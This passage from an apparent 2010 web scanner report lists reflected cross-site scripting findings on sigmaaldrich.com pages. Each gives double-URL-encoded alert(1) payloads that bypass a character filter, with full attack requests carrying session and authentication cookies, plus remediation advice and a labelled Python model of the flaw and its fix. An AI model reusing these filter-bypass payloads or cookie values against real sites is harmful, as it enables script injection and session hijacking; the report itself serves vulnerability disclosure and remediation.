ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:46 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/life-science-services/a19c7";alert(1)//c2f9597928f","E404") ;
   </script>
...[SNIP]...

1.565. http://www.sigmaaldrich.com/life-science/metabolomics.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/metabolomics.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42b6e%2522%253balert%25281%2529%252f%252f88de7cd0455 was submitted in the REST URL parameter 1. This input was echoed as 42b6e";alert(1)//88de7cd0455 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science42b6e%2522%253balert%25281%2529%252f%252f88de7cd0455/metabolomics.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:31 GMT
Content-Length: 28934
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science42b6e";alert(1)//88de7cd0455/metabolomics.html","E404") ;
   </script>
...[SNIP]...

1.566. http://www.sigmaaldrich.com/life-science/metabolomics.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/metabolomics.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b17ba%2522%253balert%25281%2529%252f%252f229ac1f2cd7 was submitted in the REST URL parameter 2. This input was echoed as b17ba";alert(1)//229ac1f2cd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
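The Python script below is an added editorial example, not scanner output and not the scanned site's code. It models the pipeline that the issue detail and remediation detail describe for findings 1.560 to 1.566: the web server URL-decodes the path once, a blacklist filter checks that once-decoded value, the application decodes it a second time and concatenates the result into a double-quoted JavaScript string. It then shows the two fixes the remediation note calls for, dropping the second decode and encoding for the JavaScript string context, and, as a secondary check, running the blacklist after full canonicalisation. The blacklist in BLOCKED, the host www.example.test:4402 and the handler functions are assumptions; the payload is the one from finding 1.566.

```python
"""Model of the double-URL-decode reflection into a JavaScript string.

Added example: not scanner output and not the scanned site's code. The
blacklist in BLOCKED, the host www.example.test and the handler functions
are assumptions that model the behaviour the report describes.
"""
import json
from urllib.parse import unquote

# Assumed blacklist: characters the application refuses in a path segment.
BLOCKED = frozenset('<>"\'')

# Payload from finding 1.566 (REST URL parameter 2 under /life-science/).
DOUBLE_ENCODED = "b17ba%2522%253balert%25281%2529%252f%252f229ac1f2cd7"
# The same payload after one URL-decode, i.e. what the application receives.
SINGLE_ENCODED = "b17ba%22%3balert%281%29%2f%2f229ac1f2cd7"


def filter_passes(value: str) -> bool:
    """Naive blacklist check on whatever string it is handed."""
    return not (BLOCKED & set(value))


def canonicalise(value: str, max_rounds: int = 5) -> str:
    """URL-decode until the value stops changing, so that validation sees the
    same characters the application will eventually use."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")


def js_string_literal(value: str) -> str:
    """Emit value as a JavaScript string literal. json.dumps escapes quotes,
    backslashes and control characters; '<' and '>' are escaped as well so a
    '</script>' inside the data cannot terminate the script block."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_vulnerable(segment: str) -> str:
    """Vulnerable handler: validates the once-decoded segment, then decodes it
    a second time and concatenates it into a double-quoted JS string."""
    if not filter_passes(segment):
        raise ValueError("blocked by filter")
    twice_decoded = unquote(segment)  # the second decode the remediation warns about
    url = "http://www.example.test:4402/life-science/" + twice_decoded
    return 'cmCreateErrorTag("Error 404 | %s","E404") ;' % url


def render_fixed(segment: str) -> str:
    """Hardened handler: no second decode, and the whole message is emitted
    through a JavaScript string encoder, so the segment stays data."""
    url = "http://www.example.test:4402/life-science/" + segment
    message = "Error 404 | " + url
    return 'cmCreateErrorTag(%s,"E404") ;' % js_string_literal(message)


def validate_after_canonicalisation(segment: str) -> bool:
    """Secondary defence from the remediation note: if the application must
    decode again, run the blacklist on the fully decoded value instead."""
    return filter_passes(canonicalise(segment))


def handle_request(raw_segment: str, renderer) -> str:
    """The web server URL-decodes the path once before the application runs."""
    return renderer(unquote(raw_segment))


def is_blocked(raw_segment: str, renderer) -> bool:
    """True if the request is rejected by the filter before rendering."""
    try:
        handle_request(raw_segment, renderer)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("single-encoded payload blocked:", is_blocked(SINGLE_ENCODED, render_vulnerable))
    print("double-encoded payload blocked:", is_blocked(DOUBLE_ENCODED, render_vulnerable))
    print("vulnerable:", handle_request(DOUBLE_ENCODED, render_vulnerable))
    print("fixed:     ", handle_request(DOUBLE_ENCODED, render_fixed))
    print("blacklist after canonicalisation passes:",
          validate_after_canonicalisation(SINGLE_ENCODED))
```

Run stand-alone, the vulnerable handler reproduces the report's echo (b17ba";alert(1)//229ac1f2cd7 lands inside the string literal and closes it), while the single-encoded form of the same payload is caught by the filter, which is exactly the gap double encoding exploits. The fixed handler never decodes again, so the browser receives the %22 and %3b as literal characters inside a properly encoded string; the output encoding is the primary defence and would hold even if the second decode were left in place, and the canonicalise-then-validate check is the fallback the remediation note describes.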

Request

GET /life-science/b17ba%2522%253balert%25281%2529%252f%252f229ac1f2cd7 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:32 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/b17ba";alert(1)//229ac1f2cd7","E404") ;
   </script>
...[SNIP]...

1.567. http://www.sigmaaldrich.com/life-science/molecular-biology.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/molecular-biology.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32bb1%2522%253balert%25281%2529%252f%252f9b8c4253cb3 was submitted in the REST URL parameter 1. This input was echoed as 32bb1";alert(1)//9b8c4253cb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science32bb1%2522%253balert%25281%2529%252f%252f9b8c4253cb3/molecular-biology.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:31 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science32bb1";alert(1)//9b8c4253cb3/molecular-biology.html","E404") ;
   </script>
...[SNIP]...

1.568. http://www.sigmaaldrich.com/life-science/molecular-biology.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/molecular-biology.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a12be%2522%253balert%25281%2529%252f%252fd73e7e9ff3b was submitted in the REST URL parameter 2. This input was echoed as a12be";alert(1)//d73e7e9ff3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/a12be%2522%253balert%25281%2529%252f%252fd73e7e9ff3b HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:34 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/a12be";alert(1)//d73e7e9ff3b","E404") ;
   </script>
...[SNIP]...

1.569. http://www.sigmaaldrich.com/life-science/nutrition-research.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/nutrition-research.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed503%2522%253balert%25281%2529%252f%252f10165721370 was submitted in the REST URL parameter 1. This input was echoed as ed503";alert(1)//10165721370 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-scienceed503%2522%253balert%25281%2529%252f%252f10165721370/nutrition-research.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
